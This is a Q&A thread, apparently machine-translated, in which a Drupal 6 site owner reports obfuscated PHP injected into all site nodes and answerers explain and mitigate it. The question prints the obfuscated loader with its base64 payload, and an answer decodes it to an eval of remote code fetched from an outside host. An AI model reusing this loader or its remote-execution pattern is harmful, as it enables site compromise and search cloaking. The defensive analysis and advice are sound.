Geek Answers Handbook

PHP SQL Injection Attack in Drupal 6

Today, all the nodes on my drupal 6 site appeared with this PHP script added

?php $node->nid = 849; preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7'); if(@$node->body): ?php echo @$node->title;? ?php echo @$node->body;? ?php else:? ... here would go the original text of the node ?php endif;?

(I removed some characters to make sure you can read the PHP code correctly)

So, I think this means that someone was able to update the information in drupal tables and enter this php script.

1 - What does this PHP code do (if at all)? (of course, in addition to preventing node content from being rendered)
2 - Any idea how they managed to do this? Is Drupal Security Leak? Mysql? 3 - I assume that the only way to restore this is to completely restore the database ...

+4
source share
5 answers

The guy who did this was really trying to make the code hard to read.

I am not 100% sure how this works, but the end result of the top line looks something like this:

 if(!function_exists('node_update_log'))@eval(@file_get_contents('http://ssedrup.org/at/r_inc.php')); if(function_exists('node_update_log'))node_update_log($node);

The one who did this aimed at your site because it is a Drupal site, are you launching the latest version? They can use the well-known security hole in Drupal / provided by the Drupal module. You use php filters in your Drupal nodes, it can be an access point.

I looked at the code associated with it, and it was also hard to read. This is the code that is responsible for updating all of your sites. It seems that the goal was to show special content for search robots by looking at the IP address. This is an SEO strategy known as synchronization.

In any case, a link to the current code that is executed :

In short, this attack on your site should have hidden the fact that the search engine is indexing some special content on your site. This is probably done to improve SEO for some sites. The one who did this really knew what he wanted to do and how to do it.

+7
source

I assume that you have a modern installation of Drupal and all the modules that you use installed. This is the most important thing you need to be sure about - stay tuned for Drupal and always update it after a security update is released.

However, it is much more likely that this is one of your modules that has a security flaw, not the Drupal core. Drupal had (and probably still) flaws, but the really nasty problems were usually in the modules.

The reason for this is that the modules are usually written by third parties who may or may not well understand good security practice. And while the kernel is used by everyone and attracts the attention of developers, most modules will not have such widespread use, so they get less development work, less testing and less use, so errors are less likely to be noticed.

Look at the non-core modules that you used for your site (this can help change your question to list them here, in case someone knows something specific).

Use Google to search for drupal modulename security or something similar, and see what happens. Also visit their pages on drupal.org and read the notes there; look how active the project is - when was the last module updated? and how often? how many developers worked on this? etc. - if these numbers are low, consider finding an alternative module to do the same job.

If your PHP skills are good enough (and you have the time), you can review the code to see if you can see anything.

Of course, this may not be a problem with drupal. If you are on a shared hosting platform, the box may have been compromised by a security problem on any of the hosted sites, as a result of which all the sites on the box were compromised (this happened to me alone - not very well). But since the code that was entered is specific to drupal, it looks like it could be a drupal hack, so the main suspect should remain your installation.

Hope this helps.

+2
source

You may have the wrong input settings. Please note that the default format is one that is accessible to everyone. If you set "FULL HTML" as the "default", you will open your site to many XSS exploits. If you set it to "PHP", you will open it to just about everyone. "Default" does not mean that it becomes only the default format, that is, already selected. This implies that everyone, including all those who can comment and post nodes, can embed any type of PHP.

+2
source

In addition to the advice mentioned, you should check your permissions. Perhaps the hacker found a way to not use the security hole (XML-RPC, PHP filter for non-admins, etc.).

Viewing server logs potentially limiting POST may provide some information on how this happened.

It is also possible that the hacker also directly accessed the database server and bypassed Drupal itself.

+1
source

Remember to check your permissions. Sometimes a developer forgets to prohibit editing from anonymous users, and it may take some time until you find about it.

0
source

More articles:


All Articles